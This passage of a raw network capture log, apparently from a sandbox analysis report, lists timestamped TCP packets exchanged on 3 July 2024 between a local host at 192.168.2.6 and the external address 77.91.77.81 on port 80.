                                                                Jul 3, 2024 08:38:24.541943073 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.541949987 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.541969061 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544665098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544692993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544715881 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544725895 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544739962 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544750929 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544797897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544809103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544820070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544835091 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544862986 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544946909 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544958115 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544967890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544977903 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.544981956 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.544990063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545007944 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545032978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545125961 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545135975 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545145988 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545157909 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545161009 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545169115 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545186996 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545213938 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545324087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545334101 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545344114 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545353889 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545356989 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545365095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545384884 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545409918 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545531988 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545542002 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545552015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545561075 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545562029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545574903 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545593023 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545617104 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545686007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545697927 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545713902 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545730114 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545770884 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545782089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545806885 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545854092 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545896053 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545906067 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545917034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545927048 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545932055 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545938015 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.545968056 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.545994043 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.546123028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.546133995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.546144009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.546154022 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.546158075 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.546197891 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630280018 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630301952 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630315065 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630332947 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630352974 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630374908 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630412102 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630423069 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630443096 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630472898 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630476952 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630508900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630539894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630549908 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630578041 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630595922 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630644083 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630655050 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630665064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630676031 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630681992 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630702972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630748034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630781889 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630789995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630815029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.630822897 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.630839109 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.665985107 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666002989 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666013956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666162968 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666199923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666246891 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666258097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666280031 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666280031 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666299105 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666348934 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666359901 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666445971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666482925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666482925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666490078 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666501999 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666538954 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666558027 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666650057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666661978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666671991 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666682005 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666723967 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666723967 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666884899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666896105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666906118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666915894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666925907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666935921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666946888 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.666951895 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.666951895 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667108059 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667160034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667171001 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667217970 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667217970 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667298079 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667309046 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667318106 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667329073 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667337894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667347908 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667357922 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667371035 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667371035 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667467117 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667623997 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667640924 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667650938 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667666912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667678118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667686939 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667692900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667692900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667697906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667709112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667718887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.667740107 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667740107 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.667968988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668057919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668068886 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668077946 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668124914 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668124914 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668174028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668184996 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668200016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668209076 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668220043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668241978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668241978 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668291092 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668401003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668411970 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668426991 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668437004 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668472052 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668472052 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668518066 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668581009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668596983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668606043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668616056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668626070 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668626070 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668698072 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668704987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668715954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668725967 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668735981 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668745995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668756008 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668766022 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668770075 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668770075 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.668777943 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668788910 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.668807030 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669017076 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669429064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669440031 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669450045 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669460058 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669470072 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669478893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669490099 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669492006 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669492006 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669500113 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669506073 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669516087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669527054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669538021 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669548035 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669552088 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669552088 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669559956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669569969 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669579983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669589996 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669599056 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669599056 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669600964 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.669635057 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.669635057 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670156002 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670166016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670176029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670186043 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670196056 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670206070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670218945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670228958 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670228958 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670229912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670241117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670250893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670262098 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670269012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670269966 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670274973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670300007 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670665026 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670818090 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670829058 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670839071 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670850039 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670861006 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670871973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670881987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670892954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670903921 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670912981 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670917988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670917988 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670924902 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670936108 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670938969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670949936 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.670960903 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670993090 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.670993090 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.721124887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721163988 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721174955 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721256971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721303940 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721314907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721317053 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.721318007 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.721400976 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721411943 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.721436024 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.721436024 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.721473932 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761615038 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761647940 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761658907 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761697054 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761751890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761755943 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761770010 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761781931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761791945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761837959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761837959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761895895 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.761966944 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761977911 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.761989117 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762002945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762015104 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762016058 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762048006 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762315035 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762325048 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762336016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762346983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762356997 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762367010 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762375116 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762375116 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762379885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762392044 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762403965 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762403011 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762415886 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762427092 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762495041 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762639999 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762682915 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762845039 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762856960 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762871981 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762882948 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762881994 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762893915 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762906075 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762913942 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762917042 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762928009 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762938023 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762948990 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762954950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762954950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762962103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762974024 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762984991 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.762993097 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.762996912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763008118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763020039 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.763020039 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763036966 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.763048887 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:24.763555050 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763566017 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763576984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763587952 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:24.763598919 CEST804971377.91.77.81192.168.2.6
